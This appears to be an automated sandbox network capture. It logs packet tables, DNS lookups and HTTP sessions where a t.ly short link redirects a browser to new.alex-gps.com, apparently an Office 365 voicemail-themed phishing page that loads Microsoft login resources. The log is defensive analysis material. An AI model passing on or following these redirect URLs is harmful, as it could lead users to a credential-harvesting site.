                                                      Oct 23, 2024 23:30:03.063985109 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.064263105 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.064308882 CEST4434922952.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.064364910 CEST49229443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.219990969 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.220033884 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:03.220159054 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.220534086 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:03.220572948 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.144855976 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.145015955 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.146220922 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.146248102 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.146759987 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.148060083 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.195337057 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.377806902 CEST4968080192.168.2.16192.229.211.108
                                                      Oct 23, 2024 23:30:04.461963892 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.462028980 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.462074995 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.462110043 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.462131023 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.462177038 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.462203026 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568353891 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.568471909 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.568475008 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568546057 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.568603992 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568689108 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568700075 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.568710089 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568753004 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:04.568772078 CEST49230443192.168.2.1652.149.20.212
                                                      Oct 23, 2024 23:30:04.568802118 CEST4434923052.149.20.212192.168.2.16
                                                      Oct 23, 2024 23:30:35.325002909 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:35.325061083 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:35.325222969 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:35.325546980 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:35.325557947 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:36.375541925 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:36.375969887 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:36.376002073 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:36.376324892 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:36.376722097 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:36.376780987 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:36.430732965 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:46.187025070 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:46.187118053 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:30:46.187211990 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:46.694642067 CEST49232443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:30:46.694680929 CEST44349232142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:35.374243021 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:35.374299049 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:35.374488115 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:35.374675989 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:35.374684095 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:36.263461113 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:36.263781071 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:36.263809919 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:36.264262915 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:36.264559984 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:36.264642954 CEST44349234142.250.186.36192.168.2.16
                                                      Oct 23, 2024 23:31:36.315596104 CEST49234443192.168.2.16142.250.186.36
                                                      Oct 23, 2024 23:31:37.095479012 CEST6213953192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:31:37.100903034 CEST53621391.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:31:37.101099014 CEST6213953192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:31:37.101099014 CEST6213953192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:31:37.106462002 CEST53621391.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:31:37.709594011 CEST53621391.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:31:37.709872007 CEST6213953192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:31:37.715719938 CEST53621391.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:31:37.715975046 CEST6213953192.168.2.161.1.1.1
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 23, 2024 23:29:30.488807917 CEST53604641.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:30.544291973 CEST53630791.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:31.393321991 CEST5278453192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:31.393486023 CEST5705253192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:31.400942087 CEST53527841.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:31.402769089 CEST53570521.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:31.797246933 CEST53639811.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:32.212598085 CEST5571453192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:32.212733984 CEST6170553192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:32.224700928 CEST53557141.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:32.225864887 CEST53617051.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:35.255676031 CEST5638053192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:35.255846977 CEST6337453192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:35.263683081 CEST53633741.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:35.264786005 CEST53563801.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:35.436058044 CEST4934553192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:35.436832905 CEST6406953192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:35.445178986 CEST53640691.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:35.454699993 CEST53493451.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.457537889 CEST5674653192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.457537889 CEST6448553192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.472022057 CEST53644851.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.512578964 CEST53567461.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.919454098 CEST5696553192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.919578075 CEST5203453192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.924107075 CEST5610853192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.924107075 CEST5490853192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.925049067 CEST5917653192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.925049067 CEST5651653192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:36.926944017 CEST53569651.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.932379961 CEST53549081.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.932411909 CEST53591761.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.932672024 CEST53565161.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.943192959 CEST53561081.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:36.943490982 CEST53520341.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:37.035819054 CEST53547021.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:38.234015942 CEST5646553192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:38.234190941 CEST5138353192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:38.242968082 CEST53564651.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:38.243510008 CEST53513831.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:39.544713974 CEST5229753192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:39.544713974 CEST6103153192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:39.552244902 CEST53522971.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:39.553013086 CEST53610311.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:48.829891920 CEST53652511.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:29:57.650316954 CEST5365286162.159.36.2192.168.2.16
                                                      Oct 23, 2024 23:29:58.311391115 CEST5224253192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:29:58.319168091 CEST53522421.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:30:35.314218044 CEST5952653192.168.2.161.1.1.1
                                                      Oct 23, 2024 23:30:35.323261976 CEST53595261.1.1.1192.168.2.16
                                                      Oct 23, 2024 23:30:37.145620108 CEST138138192.168.2.16192.168.2.255
                                                      Oct 23, 2024 23:31:37.091593027 CEST53652391.1.1.1192.168.2.16
                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Oct 23, 2024 23:29:36.943531036 CEST192.168.2.161.1.1.1c24f(Port unreachable)Destination Unreachable
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 23, 2024 23:29:31.393321991 CEST192.168.2.161.1.1.10x2c7eStandard query (0)t.lyA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:31.393486023 CEST192.168.2.161.1.1.10xfbfcStandard query (0)t.ly65IN (0x0001)false
                                                      Oct 23, 2024 23:29:32.212598085 CEST192.168.2.161.1.1.10xf66bStandard query (0)new.alex-gps.comA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:32.212733984 CEST192.168.2.161.1.1.10x70cdStandard query (0)new.alex-gps.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.255676031 CEST192.168.2.161.1.1.10xd957Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.255846977 CEST192.168.2.161.1.1.10x38bdStandard query (0)www.google.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.436058044 CEST192.168.2.161.1.1.10x8166Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.436832905 CEST192.168.2.161.1.1.10x3317Standard query (0)cdn.socket.io65IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.457537889 CEST192.168.2.161.1.1.10x8738Standard query (0)new.alex-gps.comA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.457537889 CEST192.168.2.161.1.1.10xf7e7Standard query (0)new.alex-gps.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.919454098 CEST192.168.2.161.1.1.10x250Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.919578075 CEST192.168.2.161.1.1.10xb228Standard query (0)cdn.socket.io65IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.924107075 CEST192.168.2.161.1.1.10x9d2dStandard query (0)www.w3schools.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.924107075 CEST192.168.2.161.1.1.10xdd8aStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.925049067 CEST192.168.2.161.1.1.10xd6d8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.925049067 CEST192.168.2.161.1.1.10x83dcStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.234015942 CEST192.168.2.161.1.1.10x8735Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.234190941 CEST192.168.2.161.1.1.10x6729Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.544713974 CEST192.168.2.161.1.1.10xea13Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.544713974 CEST192.168.2.161.1.1.10x2b1eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                      Oct 23, 2024 23:29:58.311391115 CEST192.168.2.161.1.1.10xa337Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                      Oct 23, 2024 23:30:35.314218044 CEST192.168.2.161.1.1.10x397aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 23, 2024 23:29:31.400942087 CEST1.1.1.1192.168.2.160x2c7eNo error (0)t.ly104.20.7.133A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:31.400942087 CEST1.1.1.1192.168.2.160x2c7eNo error (0)t.ly104.20.6.133A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:31.402769089 CEST1.1.1.1192.168.2.160xfbfcNo error (0)t.ly65IN (0x0001)false
                                                      Oct 23, 2024 23:29:32.224700928 CEST1.1.1.1192.168.2.160xf66bNo error (0)new.alex-gps.com201.102.105.236A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.263683081 CEST1.1.1.1192.168.2.160x38bdNo error (0)www.google.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.264786005 CEST1.1.1.1192.168.2.160xd957No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.445178986 CEST1.1.1.1192.168.2.160x3317No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.454699993 CEST1.1.1.1192.168.2.160x8166No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.454699993 CEST1.1.1.1192.168.2.160x8166No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.454699993 CEST1.1.1.1192.168.2.160x8166No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.454699993 CEST1.1.1.1192.168.2.160x8166No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:35.454699993 CEST1.1.1.1192.168.2.160x8166No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.512578964 CEST1.1.1.1192.168.2.160x8738No error (0)new.alex-gps.com201.102.105.236A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.926944017 CEST1.1.1.1192.168.2.160x250No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.926944017 CEST1.1.1.1192.168.2.160x250No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.187.88A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.926944017 CEST1.1.1.1192.168.2.160x250No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.187.34A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.926944017 CEST1.1.1.1192.168.2.160x250No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.187.127A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.926944017 CEST1.1.1.1192.168.2.160x250No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.187.80A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.932379961 CEST1.1.1.1192.168.2.160xdd8aNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.932379961 CEST1.1.1.1192.168.2.160xdd8aNo error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.932411909 CEST1.1.1.1192.168.2.160xd6d8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.932411909 CEST1.1.1.1192.168.2.160xd6d8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.932672024 CEST1.1.1.1192.168.2.160x83dcNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.943192959 CEST1.1.1.1192.168.2.160x9d2dNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.943490982 CEST1.1.1.1192.168.2.160xb228No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.968391895 CEST1.1.1.1192.168.2.160x89feNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.968391895 CEST1.1.1.1192.168.2.160x89feNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.970448971 CEST1.1.1.1192.168.2.160xa497No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:36.970448971 CEST1.1.1.1192.168.2.160xa497No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:37.887641907 CEST1.1.1.1192.168.2.160x202No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:37.887641907 CEST1.1.1.1192.168.2.160x202No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.242968082 CEST1.1.1.1192.168.2.160x8735No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.242968082 CEST1.1.1.1192.168.2.160x8735No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.242968082 CEST1.1.1.1192.168.2.160x8735No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.243510008 CEST1.1.1.1192.168.2.160x6729No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.243510008 CEST1.1.1.1192.168.2.160x6729No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.245032072 CEST1.1.1.1192.168.2.160x50bbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:38.245032072 CEST1.1.1.1192.168.2.160x50bbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.552244902 CEST1.1.1.1192.168.2.160xea13No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.552244902 CEST1.1.1.1192.168.2.160xea13No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.552244902 CEST1.1.1.1192.168.2.160xea13No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.553013086 CEST1.1.1.1192.168.2.160x2b1eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:39.553013086 CEST1.1.1.1192.168.2.160x2b1eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Oct 23, 2024 23:29:58.319168091 CEST1.1.1.1192.168.2.160xa337Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                      Oct 23, 2024 23:30:35.323261976 CEST1.1.1.1192.168.2.160x397aNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                      • t.ly
                                                      • new.alex-gps.com
                                                      • https:
                                                        • cdn.socket.io
                                                        • cdnjs.cloudflare.com
                                                        • aadcdn.msauth.net
                                                        • logincdn.msauth.net
                                                        • www.w3schools.com
                                                        • aadcdn.msftauth.net
                                                      • fs.microsoft.com
                                                      • slscr.update.microsoft.com
                                                      • fe3cr.delivery.mp.microsoft.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1649627104.20.7.1334436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:32 UTC652OUTGET /2jKWO HTTP/1.1
                                                      Host: t.ly
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:32 UTC801INHTTP/1.1 302 Found
                                                      Date: Wed, 23 Oct 2024 21:29:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: public, max-age=600, stale-if-error=86400, stale-while-revalidate=600, no-store
                                                      location: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N
                                                      x-frame-options: SAMEORIGIN
                                                      x-xss-protection: 1; mode=block
                                                      x-content-type-options: nosniff
                                                      x-whom: tly-app
                                                      x-do-app-origin: 86336e98-11a6-477d-b2fb-e3113d9e1e21
                                                      x-do-orig-status: 302
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: EXPIRED
                                                      Server-Timing: cfCacheStatus;desc="EXPIRED"
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                      Server: cloudflare
                                                      CF-RAY: 8d74d2b79a618d2d-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-10-23 21:29:32 UTC568INData Raw: 34 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 6e 65 77 2e 61 6c 65 78 2d 67 70 73 2e 63 6f 6d 2f 6d 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 33 5a 76 61 57 4e 6c 4a 6e 4a 68 62 6d 51 39 5a 45 68 43 52 46 6c 57 5a 7a 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4f 44 45 77 4d 6a 41 79 4e 46 55 7a 4e 44 45 77 4d 44 67 30 4d 41 3d 3d 4e 30 31 32 33 4e 27 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6e 65 77 2e 61 6c
                                                      Data Ascii: 450<!DOCTYPE html><html><head><meta charset="UTF-8" /><meta http-equiv="refresh" content="0;url='https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N'" /><title>Redirecting to https://new.al
                                                      2024-10-23 21:29:32 UTC543INData Raw: 45 68 43 52 46 6c 57 5a 7a 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4f 44 45 77 4d 6a 41 79 4e 46 55 7a 4e 44 45 77 4d 44 67 30 4d 41 3d 3d 4e 30 31 32 33 4e 3c 2f 61 3e 2e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 63 64 31 35 63 62 65 37 37 37 32 66 34 39 63 33 39 39 63 36 61 35 62 61 62 66 32 32 63 31 32 34 31 37 31 37 36 38 39 31 37 36 30 31 35 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 5a 70 73 4f 6d 6c 52 51 56 36 79 39 30 37 54 49 30 64 4b 42 48 71 39 4d 64 32 39 6e 6e 61 45 49 50 6c 6b 66 38 34 72 6e 61 45 52 6e 71 36 7a 76 57 76 50 55 71 72 32 66 74 38 4d
                                                      Data Ascii: EhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N</a>.<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M
                                                      2024-10-23 21:29:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.1649629201.102.105.2364436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:32 UTC744OUTGET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N HTTP/1.1
                                                      Host: new.alex-gps.com
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
